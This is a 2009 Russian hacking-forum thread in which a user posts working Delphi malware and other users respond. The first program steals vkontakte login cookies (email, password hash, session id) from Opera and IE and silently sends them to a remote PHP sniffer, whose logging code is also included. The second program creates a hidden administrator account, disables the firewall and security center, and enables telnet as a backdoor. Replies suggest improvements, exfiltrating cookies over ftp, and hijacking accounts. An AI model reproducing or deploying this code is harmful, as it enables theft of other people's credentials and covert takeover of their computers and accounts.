Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Сливаем Hash от vkontakte.ru[Delphi+php] |
25.05.2009, 21:22
|
|
Познающий
Регистрация: 23.05.2009
Сообщений: 35
Провел на форуме:
104584
Репутация:
32
|
|
Сливаем Hash от vkontakte.ru[Delphi+php]
Вот написал меленькую программку для пользователей своей сети, может кому будет интерсено
Код:
program killall;
{$APPTYPE CONSOLE}
uses
SysUtils,windows,ShellAPI;
//-----------Ïîëó÷åìå ëîãèí òåêóøåãî ïîëüçîâàòåëÿ--------------------------------
function GetUserFromWindows: string;
var
UserName : string;
UserNameLen : Dword;
begin
UserNameLen := 255;
SetLength(userName, UserNameLen);
if GetUserName(PChar(UserName), UserNameLen) then
Result := Copy(UserName,1,UserNameLen - 1)
else
Result := 'Unknown';
end;
//------------------------------------------------------------------------------
//-------------------Ïîëó÷àåì ñèñòåìíûé äèñê------------------------------------
function GetSystemDisk: string;
var
S: array[0..MAX_PATH] of Char;
begin
GetWindowsDirectory(S,SizeOf(S));
Result:=copy(S,0,1);
end;
//------------------------------------------------------------------------------
var
User,Disc,mail,hash,id,startdir:string;
coock,st,mask:string;
f:TextFile;
i:integer;
searchrec : tsearchrec;
Opera,IE: string;
begin
Disc:=GetSystemDisk;
User:=GetUserFromWindows;
Opera:= Disc+':\Documents and Settings\'+User+'\Application Data\Opera\Opera\profile\cookies4.dat';
if FileExists(Opera) then
begin
AssignFile(f,Opera);
Reset(f);
for i:=0 to 500 do
begin
Readln(f, st);
coock:=coock+st;
end;
delete(coock,1,pos('remixemail',coock)+12);
mail:=copy(coock,0,pos(#18,coock)-1);
delete(coock,1,pos('remixpass',coock)+11);
hash:=copy(coock,0,pos(#18,coock)-1);
delete(coock,1,pos('remixsid',coock)+9);
id:=copy(coock,0,pos(#18,coock)-1);
ShellExecute(0, nil, PChar('http://xx.xx.x.xx/snif.php?t=opera&i='+id+'&m='+mail+'&h='+hash), nil, nil, SW_HIDE);
end;
startdir:=Disc+':\Documents and Settings\'+User+'\Cookies\';
mask := '*.*';
if findfirst(startdir+mask, faanyfile, searchrec) = 0 then
begin
repeat
if pos('vkontakte',searchrec.name)<>0 then
begin
AssignFile(f,startdir+searchrec.name);
Reset(f);
for i:=0 to 500 do
begin
Readln(f, st);
coock:=coock+st;
end;
delete(coock,1,pos('remixemail',coock)+9);
mail:=copy(coock,0,pos('vkon',coock)-1);
delete(coock,1,pos('remixpass',coock)+11);
hash:=copy(coock,0,pos('vkon',coock)-1);
delete(coock,1,pos('remixsid',coock)+9);
id:=copy(coock,0,pos('vkon',coock)-1);
ShellExecute(0, nil, PChar('http://xx.xx.x.xxx/snif.php?t=ie&i='+id+'&m='+mail+'&h='+hash), nil, nil, SW_HIDE);
end;
until findnext(searchrec) <> 0;
end;
end.
и код снифера(snif.php)
PHP код:
<?php
$fp=fopen("sn.html","a+t");
fputs($fp,"
Время: ".date("[D d/m/Y H:i]")."<br>
Мыло: ".$_GET['m']."<br>
Хэш: ".$_GET['h']."<br>
ID: ".$_GET['i']."<br>
Браузер: ".$_GET['t']."<br><br>
");
fclose($fp);
header("Location: http://google.ru");
?>
Последний раз редактировалось JeDaSe; 25.05.2009 в 21:25..
|
|
|
25.05.2009, 21:26
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
а, сорри, зачет
Последний раз редактировалось wildshaman; 25.05.2009 в 21:32..
|
|
|
|
25.05.2009, 21:30
|
|
Познающий
Регистрация: 23.05.2009
Сообщений: 35
Провел на форуме:
104584
Репутация:
32
|
|
Сообщение от wildshaman
Тырит только от оперы - низачот(
Ну наверно надо посмотреть получше
Сообщение от root_sashok
странно, каменты кракозябрами
первый раз пишу на форуме ещё не разобрался что как
|
|
|
|
27.05.2009, 02:24
|
|
Постоянный
Регистрация: 20.03.2009
Сообщений: 564
Провел на форуме:
991929
Репутация:
395
|
|
идея прикольная
в проге недаработки
1) открываешь файл и почемуто считываешь 500 строк (как я понял в делфи не селен) и там уже ишешь строку нужную... а если файл намного больше?
2) а если там нет кук вконтакта, тогда что? тогда она наверное вылетит с ошибкой или в лучшем случае пошлет пустые параметры.
3) для отправки ты как я смотрю используешь тупа выполнить... и параметры передаешь в GET запросе - а ведь GET запросы остаются в логах веб сервера... вывод POST и WINSOCK
|
|
|
|
27.05.2009, 02:31
|
|
Постоянный
Регистрация: 20.03.2009
Сообщений: 564
Провел на форуме:
991929
Репутация:
395
|
|
кстати реализовать можно намного проще... архивировать куки и используя системную комманду ftp (фаер побреется...) скрытно передавать их на свой ftp... а потом тиха разбирать, я думаю кроме контакта найдутся еще куча кук на интересные сервисы. хотя это все рутина )) прогой анализировать круче хех
на основе данных можно сделать активный снифер кук. взял куки с харда зашел поменял пароль - ты насяльника
|
|
|
|
28.05.2009, 11:37
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 281
Провел на форуме:
2823587
Репутация:
106
|
|
А я для пользователей своей сети использую. ARP spoofing + Wireshark.
Больше интересного вытащить можно)
|
|
|
|
28.05.2009, 12:04
|
|
Познающий
Регистрация: 23.05.2009
Сообщений: 35
Провел на форуме:
104584
Репутация:
32
|
|
Вот ещё интересная вещь, но старая
Код:
{ *********************************************************************** }
{ Delphi 7 }
{ JeDaSe ICQ:8673900 }
{ exec telnet & kill SharedAccess }
{ *********************************************************************** }
program PsevdoSHELL;
{$APPTYPE CONSOLE}
uses
SysUtils,windows;
var
Login,pass:string;
begin
Pass:='Hackers'; // Пароль пользователя(взломщика)
Login:='Hackers';// Логин
winexec(PChar('cmd.exe /c net user '+Login+' '+Pass+' /add'),sw_normal);//Добавляем пользователя
winexec(PChar('cmd.exe /c net localgroup "Администраторы" '+Login+' /add '),sw_normal);//Делаем его админом
winexec(PChar('cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "'+Login+'" /t REG_DWORD /d 00000000'),sw_normal);
winexec(PChar('cmd.exe /c sc config wscsvc start= disabled'),sw_normal);
winexec(PChar('cmd.exe /c sc config SharedAccess start= disabled'),sw_normal); //останавливаеи брендмауер
winexec(PChar('cmd.exe /c sc config tlntsvr start= auto'),sw_normal);
winexec(PChar('cmd.exe /c sc stop wscsvc'),sw_normal);
winexec(PChar('cmd.exe /c sc stop SharedAccess '),sw_normal);
winexec(PChar('cmd.exe /c sc start tlntsvr '),sw_normal); //запускаем телнет
end.
отключает брендмауер и запускает телнет
Последний раз редактировалось JeDaSe; 28.05.2009 в 12:06..
|
|
|
|
03.06.2009, 12:35
|
|
Участник форума
Регистрация: 27.03.2008
Сообщений: 288
Провел на форуме:
800727
Репутация:
83
|
|
а без этого bat файлом сложно  ?
Кстати код не идеален, сработает только на рус винде, и только если прогу запутил админ |
|
|
|
03.06.2009, 12:51
|
|
Участник форума
Регистрация: 02.11.2008
Сообщений: 222
Провел на форуме:
3459722
Репутация:
155
|
|
ТСу зачет однозначно!
|
|
|
|
05.06.2009, 03:44
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
root_sashok каменты крозяблами потому что тс копировал из делфи у мну тоже такое бывает  |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
